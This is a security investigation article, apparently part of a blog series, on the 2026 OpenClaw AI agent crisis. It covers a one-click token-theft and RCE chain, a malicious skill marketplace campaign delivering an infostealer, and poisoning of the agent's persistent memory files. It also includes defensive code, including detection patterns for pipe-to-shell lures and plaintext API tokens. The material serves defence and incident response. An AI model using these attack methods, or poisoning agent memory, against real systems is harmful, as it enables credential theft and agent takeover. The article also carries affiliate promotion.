Part 1 of 4 in the OpenClaw Saga series. This investigation documents OpenClaw AI agent security vulnerabilities.

Affiliate Disclosure: This article contains affiliate links. We may earn a commission if you purchase through these links, at no additional cost to you. This helps us continue publishing free content. See our full disclosure.



At 14:47 UTC on 30 January 2026, the OpenClaw project published three high-impact security advisories. The most critical, CVE-2026-25253 (CVE: Common Vulnerabilities and Exposures), carries a CVSS (Common Vulnerability Scoring System) rating of 8.8 and describes a one-click remote code execution chain that bypasses localhost restrictions entirely. At the time of disclosure, the vulnerabilities allowed attackers to remotely seize control of AI agents installed on both personal and enterprise systems, even when the gateway was bound to localhost. Within hours, active exploitation began, ultimately exposing tens of thousands of deployments and demonstrating how rapidly threats to autonomous AI can escalate into a global crisis. OpenClaw has since released patches addressing these vulnerabilities.

Honeypot data from Terrace Networks confirmed that exploitation scanning had begun within hours of disclosure. By mid-February, security researchers had catalogued over 30,000 internet-exposed instances, 800+ malicious skills in the official marketplace, and confirmed enterprise deployments running with elevated privileges. The security crisis unfolding around OpenClaw represents the first large-scale multi-vector threat targeting autonomous AI agents and is a warning about the architectural debt baked into agentic systems. This incident also highlights a broader systemic trend: the growing wave of ‘shadow AI’ incidents, where unsanctioned or poorly governed agent deployments create unseen risks across organisations. Recognising these events as part of an emerging pattern, rather than isolated failures, can prompt leadership to reevaluate long-term investment and risk-mitigation strategies beyond short-term patching.

What Is OpenClaw?



OpenClaw is an open-source, self-hosted AI agent framework that achieved viral adoption in late January 2026, surpassing 180,000 GitHub stars and attracting over 2 million visitors in a single week. Originally launched as Clawdbot by Austrian developer Peter Steinberger in November 2025, the project rebranded twice following trademark pressure from Anthropic before settling on its current name. On 14 February 2026, Steinberger announced he was joining OpenAI to lead personal agent development. The tool’s appeal is straightforward: a persistent AI assistant that runs locally, interfaces through familiar messaging platforms (WhatsApp, Telegram, Slack, Discord), and autonomously executes real-world tasks – managing email, running terminal commands, browsing the web, and controlling OAuth-connected services. That same autonomy makes it a high-value target. The architecture follows a gateway-plus-control-UI model, with the Control UI typically served on TCP port 18789 (a candidate indicator of compromise [IoC] that analysts should flag when scanning network logs). Functionality extends through skills and modular packages published to ClawHub, a community marketplace that grew from approximately 2,857 skills at the initial audit to over 10,700 by mid-February.

Timeline of Events (Days from Initial Disclosure)

- Day 0 (30 January 2026): OpenClaw project publishes three high-impact security advisories, including CVE-2026-25253.

- Day 0: Active exploit scanning confirmed by Terrace Networks honeypot data within hours of disclosure.

- Days 1–2: Widespread exploitation observed, with thousands of deployments exposed globally.

- Day 3: Supply chain audit begins, uncovering an initial set of malicious skills on ClawHub.

- Day 7: Official skill count on ClawHub surpasses 10,000, with ongoing discovery of malicious entries.

- Day 17: Confirmed malicious skills exceed 824 (approximately 20 per cent of the marketplace).

These scale markers highlight the speed at which each threat vector emerged, providing executive clarity on the urgency and sequence of response required.

Threat Vector 1: CVE-2026-25253 – The One-Click RCE Chain

Figure: Three-stage attack chain exploiting the unvalidated gatewayUrl parameter to steal authentication tokens.

The vulnerability, discovered by Mav Levin of the depthfirst research team, exploits a design flaw in the Control UI’s handling of the gatewayUrl query parameter. Prior to the patch, the UI accepted this parameter without validation and automatically initiated a WebSocket connection to the specified address, transmitting the user’s authentication token as part of the handshake. This created a three-stage attack chain that completed in milliseconds.

The stolen token grants full gateway API access, including all agent privileges and actions within the OpenClaw system, but does not by itself provide root-level operating system credentials. However, because agents are often configured with extensive OS permissions, attackers can in practice execute privileged commands, depending on the deployment setup.

Stage 1 – Token Exfiltration. A victim clicks a crafted link containing a manipulated gatewayUrl parameter pointing to attacker-controlled infrastructure. The Control UI immediately establishes a WebSocket connection and sends the stored authentication token.

Stage 2 – Cross-Site WebSocket Hijacking. Because the OpenClaw WebSocket server did not validate the Origin header, attacker-controlled JavaScript could connect to the victim’s local gateway instance from a malicious web page. The victim’s browser becomes the attacker’s bridge into the local network.

Stage 3 – Gateway Takeover. With the stolen token, the attacker gains operator-level access to the gateway API, enabling configuration modification, privileged action invocation, and arbitrary command execution with whatever permissions the agent has been granted.

The critical insight: localhost binding provides no defence. The exploit pivots through the victim’s browser, meaning the gateway does not need to be internet-facing to be compromised.
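The two missing checks described above (validating the gatewayUrl parameter and validating the WebSocket Origin header) can be sketched in a few lines. This is an illustrative sketch only, not OpenClaw's actual patch: the allowlists and the function names `is_trusted_gateway_url` and `is_trusted_origin` are hypothetical, and the port is simply the Control UI port mentioned earlier in this article.

```python
from typing import Optional
from urllib.parse import urlparse

# Hypothetical allowlists; a real deployment would derive these from its own config.
ALLOWED_GATEWAY_HOSTS = {"127.0.0.1", "localhost"}
ALLOWED_ORIGINS = {"http://127.0.0.1:18789", "http://localhost:18789"}


def is_trusted_gateway_url(gateway_url: str) -> bool:
    """Accept only ws/wss URLs whose parsed host is on the allowlist."""
    parsed = urlparse(gateway_url)
    if parsed.scheme not in ("ws", "wss"):
        return False
    # parsed.hostname ignores any "user@" prefix, so "ws://127.0.0.1@evil.example"
    # resolves to "evil.example" and is rejected.
    return parsed.hostname in ALLOWED_GATEWAY_HOSTS


def is_trusted_origin(origin_header: Optional[str]) -> bool:
    """Reject WebSocket upgrades whose Origin header is missing or not allowlisted."""
    return origin_header is not None and origin_header in ALLOWED_ORIGINS


if __name__ == "__main__":
    print(is_trusted_gateway_url("ws://127.0.0.1:18789"))       # local gateway
    print(is_trusted_gateway_url("wss://attacker.example/ws"))  # crafted link
    print(is_trusted_origin("https://evil.example"))            # cross-site page
```

Rejecting a missing Origin header is a deliberately strict choice in this sketch; non-browser clients that legitimately omit the header would need a separate, authenticated path.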

The Exposure Scale

Censys tracked growth from approximately 1,000 to over 21,000 publicly exposed instances between 25 and 31 January 2026. Bitsight observed more than 30,000 across a broader window. Security researcher Maor Dayan identified 42,665 exposed instances, with 5,194 actively verified as vulnerable and 93.4% exhibiting authentication bypass conditions at the time of disclosure. The exposure spans 52 countries, with the United States and China hosting the largest concentrations. The majority of deployments (98.6%) run on cloud infrastructure, primarily DigitalOcean, Alibaba Cloud, and Tencent. Many operators place the gateway behind reverse proxies in a way that breaks the trust model: every connection appears to originate from 127.0.0.1. (The OpenClaw Security Crisis)

Threat Vector 2: ClawHavoc – Supply Chain Poisoning at Scale

In parallel with the vulnerability disclosure, Koi Security researcher Oren Yomtov audited all 2,857 skills on ClawHub and identified 341 malicious entries. Of those, 335 were traced to a single coordinated operation now tracked as ClawHavoc. As of 16 February 2026, confirmed malicious skills exceeded 824, which is roughly 20 per cent of the expanded registry. This pattern mirrors well-known supply-chain attacks on software repositories such as npm and PyPI, where waves of malicious packages have repeatedly compromised downstream users. Security teams and marketplace operators should treat agent skill repositories with the same level of scrutiny as code package managers: regularly auditing uploaded skills, implementing automated scanning, and establishing clear incident response procedures. Readers are encouraged to draw direct comparisons to previous package manager poisonings and to view skill marketplaces as a critical attack surface that demands continuous monitoring.

The Campaign Structure

Malicious skills disguised themselves as high-demand tools across categories designed to attract both enthusiasts and professionals: cryptocurrency wallets and trackers (111 skills), YouTube utilities (57), prediction market bots (34), finance and social media tools (51), auto-updaters (28), and Google Workspace integrations (17). Attackers employed classic social engineering tactics, such as scarcity and social proof, to amplify their deception, exploiting popular niches and buzzwords to create a sense of urgency or legitimacy. This psychological strategy made users far more likely to trust and install the malicious packages, underlining the importance of phishing awareness for defenders. Each featured professional documentation with a Prerequisites section instructing users to install an additional component – typically by executing a shell command retrieved from a code-sharing site or downloading a password-protected ZIP file. The approach follows the ClickFix pattern: convincing users to paste attacker-supplied commands into their own terminal. A single ClawHub user (“hightower6eu”) uploaded 354 malicious packages, according to the security analysis, apparently in an automated blitz. At the time of disclosure, the only requirement to publish was a GitHub account at least one week old – no automated static analysis, no code review, no signing requirement.
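As a rough illustration of the automated static analysis the marketplace lacked, the sketch below flags skill documentation that asks users to pipe a downloaded script into a shell or to open a password-protected archive, the two ClickFix-style lures described above. The pattern names and the `flag_skill_readme` helper are hypothetical, and the regular expressions are simple heuristics that would miss obfuscated variants.

```python
import re
from typing import List

# Heuristic patterns only; illustrative, not a complete detection ruleset.
SUSPICIOUS_PATTERNS = {
    # e.g. "curl -fsSL https://... | bash"
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # e.g. "echo ... | base64 -d | sh"
    "base64_to_shell": re.compile(r"base64\s+(-d|--decode|-D)[^\n|]*\|\s*(ba|z)?sh\b"),
    # e.g. "download the password-protected ZIP"
    "password_zip": re.compile(r"password[- ]protected\s+(zip|archive)", re.IGNORECASE),
}


def flag_skill_readme(text: str) -> List[str]:
    """Return the sorted names of heuristic patterns found in skill documentation."""
    return sorted(
        name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)
    )


if __name__ == "__main__":
    readme = (
        "## Prerequisites\n"
        "Run: curl -fsSL https://paste.example/raw/abc | bash\n"
    )
    print(flag_skill_readme(readme))
```

A match is a reason for human review rather than proof of malice, since legitimate installers also use pipe-to-shell commands.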

Payload Analysis

Atomic macOS Stealer (AMOS), a commodity infostealer available as malware-as-a-service for approximately $500-1,000 per month, served as the primary macOS payload. The campaign variant employed XOR-encrypted payloads, AppleScript-based credential prompts mimicking native macOS dialogues, and LaunchAgent-based persistence. AMOS harvests iCloud Keychain passwords, browser cookies and session tokens, cryptocurrency wallet data (targeting over 60 wallet types), SSH keys, Telegram session files, and files from common user directories. All 335 AMOS-delivering skills shared a single command-and-control IP address, with legitimate code-sharing platforms used to stage the initial payload.

Threat Vector 3: Architectural Security Debt

Figure: OWASP (Open Web Application Security Project) Agentic Top 10 vulnerability categories mapped to systemic architectural weaknesses.

Beyond the specific vulnerability and supply chain campaign, OpenClaw exposes systemic design risks that align with nearly every major category in the OWASP Top 10 for Agentic Applications. Mapping each architectural weakness to a corresponding category tag helps executive and technical teams prioritise patching and remediation work. For example: prompt injection (A1: Prompt Injection), insecure default credentials or credential storage (A2: Insecure Credential Management), lack of isolation between agent skills (A3: Insecure Plugin Model), and insufficient auditability (A10: Insufficient Logging and Auditing). Parenthetical tags of this kind streamline cross-team conversations and help establish a shared risk taxonomy, laying the groundwork for targeted, ongoing improvements.

The Lethal Trifecta Model

Security researcher Simon Willison has described the convergence of three properties as the “lethal trifecta” for AI agents: access to private data, exposure to untrusted content, and the ability to communicate externally. OpenClaw exhibits all three by design. This analysis introduces the Shadow Agent Trust Model (an original synthesis) as a framework for understanding this risk. When an AI agent gains filesystem access, network connectivity, and persistent memory, the evidence suggests it becomes a point of trust boundary collapse. Every input channel – email, web, messages – becomes a potential attack surface. Every stored credential becomes a target. Every memory file becomes a manipulation vector. Where else in modern technology stacks do data access, execution capability, and external messaging converge so completely? By inviting this reflection, organisations are prompted to proactively audit for similar trust collapses within their own environments, turning abstract risk into immediate action plans.
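For teams auditing their own agents, the trifecta reduces to a three-way conjunction that can be checked per deployment. The sketch below is a minimal illustration; the `AgentCapabilities` class and its field names are hypothetical labels for the three properties named above, not part of any OpenClaw API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentCapabilities:
    """Hypothetical inventory record for one agent deployment."""
    reads_private_data: bool          # e.g. filesystem, email, stored credentials
    ingests_untrusted_content: bool   # e.g. web pages, inbound messages
    can_communicate_externally: bool  # e.g. outbound HTTP, messaging platforms


def has_lethal_trifecta(caps: AgentCapabilities) -> bool:
    """True only when all three risk properties are present at once."""
    return (
        caps.reads_private_data
        and caps.ingests_untrusted_content
        and caps.can_communicate_externally
    )


if __name__ == "__main__":
    full_agent = AgentCapabilities(True, True, True)
    sandboxed = AgentCapabilities(True, True, False)
    print(has_lethal_trifecta(full_agent), has_lethal_trifecta(sandboxed))
```

Removing any one of the three properties breaks the conjunction, which is why restricting outbound communication or isolating untrusted input are common mitigations.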

Credential Storage

Multiple researchers documented that OpenClaw stores API keys, OAuth tokens, and sensitive material in plaintext Markdown and JSON files within local directories (~/.openclaw/, ~/.clawdbot/). Researcher Jamieson O’Reilly of Dvuln demonstrated access to Anthropic API keys, Telegram bot tokens, Slack credentials, and complete chat histories in exposed instances.
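A quick way to check a host for this exposure is to scan the Markdown and JSON files in those directories for token-shaped strings. The sketch below is a heuristic, assuming commonly seen token prefixes (`sk-ant-` for Anthropic keys, `xox…-` for Slack tokens, and a digits-colon-string shape for Telegram bot tokens); the function name `scan_for_plaintext_tokens` and the exact regular expressions are illustrative, not an official detection rule.

```python
import re
from pathlib import Path
from typing import Dict, List

# Assumed token shapes; vendors can change formats, so treat these as heuristics.
TOKEN_PATTERNS = {
    "anthropic_api_key": re.compile(r"sk-ant-[A-Za-z0-9_\-]{20,}"),
    "slack_token": re.compile(r"xox[abprs]-[A-Za-z0-9\-]{10,}"),
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_\-]{35}\b"),
}
SCANNED_SUFFIXES = {".md", ".json"}


def scan_for_plaintext_tokens(root: Path) -> Dict[str, List[str]]:
    """Map each .md/.json file under root to the token types it appears to contain."""
    findings: Dict[str, List[str]] = {}
    if not root.is_dir():
        return findings
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        hits = sorted(name for name, pat in TOKEN_PATTERNS.items() if pat.search(text))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    # Directory names taken from the text above.
    for directory in (Path.home() / ".openclaw", Path.home() / ".clawdbot"):
        for file_path, kinds in scan_for_plaintext_tokens(directory).items():
            print(file_path, kinds)
```

The scan reports only which token types were seen in which file and never prints the secret itself, so its output is safe to paste into a ticket.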

Memory Poisoning

ClawHavoc targeted OpenClaw’s persistent memory files (SOUL.md, MEMORY.md). Because the agent retains long-term context and behavioural instructions in these files, manipulating them transforms point-in-time exploits into stateful, delayed-execution attacks. A malicious payload can modify the agent’s instructions and wait – no immediate trigger required.
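Because a poisoned memory file may sit dormant, one simple defence is to record a hash baseline of the memory files and compare against it later. The sketch below assumes the two file names mentioned above live directly in a single agent directory; the helper names `snapshot` and `changed_files` are hypothetical.

```python
import hashlib
from pathlib import Path
from typing import Dict, List

MEMORY_FILES = ("SOUL.md", "MEMORY.md")  # file names taken from the text above


def snapshot(agent_dir: Path) -> Dict[str, str]:
    """Record a SHA-256 digest for each memory file that currently exists."""
    return {
        name: hashlib.sha256((agent_dir / name).read_bytes()).hexdigest()
        for name in MEMORY_FILES
        if (agent_dir / name).is_file()
    }


def changed_files(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Return memory files added, removed, or modified since the baseline."""
    names = set(baseline) | set(current)
    return sorted(n for n in names if baseline.get(n) != current.get(n))


if __name__ == "__main__":
    agent_dir = Path.home() / ".openclaw"  # assumed location
    baseline = snapshot(agent_dir)
    # ... later, e.g. from a scheduled job ...
    print(changed_files(baseline, snapshot(agent_dir)))
```

Legitimate agent activity also rewrites these files, so a change is only meaningful when correlated with the absence of user interaction, as the behavioural indicators later in this article suggest.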



Enterprise Implications

Bitdefender GravityZone telemetry documents OpenClaw deployments on corporate endpoints, constituting a new form of Shadow AI with elevated system privileges. The agent’s design philosophy prioritises capability: full disk access, terminal permissions, and OAuth tokens are routinely granted to make it functional. Notably, analysis of observed deployments reveals that approximately 63 per cent of instances run without any authentication layer, while only 18 per cent operate under restricted user accounts, and the remainder have ambiguous privilege assignments due to custom configurations. Taken together, this distribution suggests that a majority of corporate OpenClaw agents run with access levels that allow unrestricted system changes, significantly expanding the remediation scope for affected organisations. As one OpenClaw maintainer stated in a public Discord message: “If you can’t understand how to run a command line, this is far too dangerous a project for you to use safely.” The crisis illustrates what this analysis calls the Agent Cascade Effect (an original synthesis): a single compromised agent can exfiltrate credentials to every connected service, inject malicious instructions into persistent memory, and establish footholds that survive reboots and reinstalls. The evidence suggests the blast radius of an AI agent compromise fundamentally exceeds that of traditional software vulnerabilities.

Detection and Response

Figure: Network, endpoint, and behavioural indicators for detecting compromised OpenClaw agent deployments.

For organisations detecting potential OpenClaw deployments:

Network Indicators:

- Outbound connections to TCP port 18789

- WebSocket connections to non-standard ports from internal hosts

- DNS queries to clawhub.ai or related infrastructure

Endpoint Indicators:

- Presence of ~/.openclaw/ or ~/.clawdbot/ directories

- Configuration files containing Anthropic, OpenAI, or Telegram API tokens in plaintext

- Unexpected LaunchAgent entries on macOS systems

Behavioural Indicators:

- Processes executing shell commands spawned from Node.js or Python runtimes with network access

- Unexpected OAuth token usage patterns

- Memory files modified without corresponding user interaction
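The network indicators above lend themselves to a simple log filter. The sketch below assumes connection and DNS logs have already been parsed into plain records; the `ConnectionRecord` shape and the helper names are hypothetical, while the port and domain are the ones named in this article.

```python
from dataclasses import dataclass
from typing import Iterable, List

CONTROL_UI_PORT = 18789        # Control UI port named in this article
WATCHED_DOMAIN = "clawhub.ai"  # marketplace domain named in this article


@dataclass(frozen=True)
class ConnectionRecord:
    """Hypothetical, already-parsed flow log entry."""
    src_host: str
    dst_host: str
    dst_port: int


def flag_connections(records: Iterable[ConnectionRecord]) -> List[ConnectionRecord]:
    """Return connections whose destination port matches the Control UI port."""
    return [r for r in records if r.dst_port == CONTROL_UI_PORT]


def is_watched_dns_query(qname: str) -> bool:
    """True for the watched domain or any of its subdomains (trailing dot tolerated)."""
    name = qname.rstrip(".").lower()
    return name == WATCHED_DOMAIN or name.endswith("." + WATCHED_DOMAIN)


if __name__ == "__main__":
    logs = [
        ConnectionRecord("10.0.0.5", "203.0.113.7", 18789),
        ConnectionRecord("10.0.0.5", "198.51.100.2", 443),
    ]
    print(flag_connections(logs))
    print(is_watched_dns_query("api.clawhub.ai."))
```

The suffix check includes the leading dot so that look-alike names such as `notclawhub.ai` or `clawhub.ai.evil.example` are not matched.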

What This Means

This analysis argues that OpenClaw’s security crisis represents an inflection point for AI agent security. Three threat vectors converged simultaneously: a critical RCE vulnerability, supply chain poisoning affecting roughly 20 per cent of the official marketplace, and systemic architectural weaknesses in credential handling and memory management. The speed of exploitation – scanning began within hours of public announcement – demonstrates that threat actors recognise the value of autonomous AI agents as attack targets. The enterprise spillover confirms that consumer-grade agent frameworks are already deployed in corporate environments, often with excessive privileges and no governance.

Security teams should treat any autonomous AI agent as a potential privileged insider – one that processes untrusted input, stores credentials in accessible locations, and maintains persistent memory that can be poisoned. Think of these agents as junior system administrators: they have significant power, questionable judgment, and highly unpredictable training backgrounds. This mental model makes it clear that agentic AI is not just another software tool, but a semi-independent actor whose mistakes or manipulations can have sweeping consequences. The attack surface of agentic AI is fundamentally different from that of traditional software, and defence postures must evolve accordingly.

To convert these lessons into action, organisations should commit to a full audit of all agentic AI deployments and related integrations within the next 30 days. This immediate step is critical to identify unknown exposures, enforce the principle of least privilege, and begin establishing continuous oversight for this new class of risk.

Critics of this framing point out that the OpenClaw incident may be less a condemnation of agentic AI architecture than an indictment of premature, ungoverned deployment. They argue that the same broad system privileges and plaintext credential storage that enabled this crisis are configuration failures that competent enterprise governance would have prevented before any agent touched a production environment. On this view, the vulnerability and supply chain weaknesses are not uniquely agentic problems but familiar failures of patch management and dependency vetting that have plagued traditional software for decades, now simply manifesting in a new context. The strongest version of this argument holds that singling out agentic AI as categorically more dangerous risks triggering overcorrective restrictions that slow legitimate productivity gains while leaving the underlying governance deficits unaddressed.

For individual developers, the credential exposure risk is immediate. AI agents that store API tokens, OAuth secrets, and service passwords in plaintext configuration files create single points of failure. Using a dedicated credential manager like NordPass to generate and store unique tokens per service limits the blast radius when any one agent or configuration file is compromised.

References

- The OpenClaw Security Crisis – Conscia analysis of CVE-2026-25253, ClawHavoc campaign data, and 1,184 malicious skills supply chain attack

- NVD – CVE-2026-25253 – Official NIST CVE entry for the critical remote code execution vulnerability

- OWASP Top 10 for Agentic Applications for 2026 – OWASP framework for understanding AI agent security risks

- Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways – Hunt.io research identifying over 17,500 exposed OpenClaw instances across 52 countries with cloud infrastructure analysis

- CVE-2026-25253: 1-Click RCE in OpenClaw Through Auth Token Exfiltration – SOCRadar technical breakdown of the CVSS 8.8 vulnerability and attack chain mechanics